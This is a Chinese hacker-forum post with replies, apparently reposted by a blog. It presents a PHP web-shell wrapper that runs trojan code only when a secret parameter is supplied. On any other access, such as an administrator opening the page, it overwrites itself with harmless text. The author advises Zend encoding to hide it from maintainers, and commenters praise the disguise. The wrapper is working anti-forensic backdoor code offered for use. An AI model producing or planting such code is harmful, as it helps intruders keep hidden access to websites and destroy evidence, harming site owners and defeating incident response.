记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

这种自毁马有木有意义!!一种另类的脚本木马伪装思路……

2013-12-15 16:05

这种自毁马有木有意义!!

juuxdd (["'<$ /_\> & ]) | 2013-12-14 23:46

<?
if($_REQUEST["oo000"]==c47d187067c6cf953245f128b5fde62a){
一句话,或者木马代码!
}
else{
$url = $_SERVER['PHP_SELF'];
$filename = end(explode('/',$url));

$content = 'helloworld';
$fp = fopen ("$filename","w");
if (fwrite ($fp, $content)){
fclose ($fp);
die ("error");
} else {
fclose ($fp);
die ("good");
}
exit;
}
?>

用zend吧代码加密起来,

一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字

不会被维护人员发觉!!被发现自动消失!

自己访问的时候?oo000=***这样,访问的方式不对,也会写入正常文字,

抛砖引玉,大牛勿喷

[原文地址]

相关讨论:

1#

hqdvista (...) | 2013-12-14 23:49

和zend结合是有点意思

2#

juuxdd (["'<$ /_\> & ]) | 2013-12-14 23:51

@hqdvista 恩, 这样看不到代码真实的执行过程,技术人员一般会在浏览器访问以下,然后就,没有然后了!

3#

pangshenjie (whoami) | 2013-12-15 00:02

@juuxdd 管理人员一访问,然后这个文件就没有了,如果你是管理员,你觉得这正常么

4#

juuxdd (["'<$ /_\> & ]) | 2013-12-15 00:06

@pangshenjie 是文件内容变成别的了,不过一般很少有人会复制一份保存起来吧,至少我觉得是这样

5#

Ki11 (ฏ๎๎๎๎๎๎๎๎๎ฏ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้้้้็็็็็้้้้้็็็้็็็ ้้้้้็็็็็้้้้็็็็็ฏ๎็็็็็็oด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้ ้้้้้็็็็็้้้้็็็็็ฏ๎๎๎๎๎๎๎๎๎ฏฏด้้้้้็็็็็้้o ้้้) | 2013-12-15 00:52

我想到一个更好的

6#

淡漠天空 (路人的世界) | 2013-12-15 08:54

@Ki11 ?

7#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-12-15 09:50

此“伪装”思路非常不错!


知识来源: lcx.cc/?i=4091

阅读:103867 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“这种自毁马有木有意义!!一种另类的脚本木马伪装思路……”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云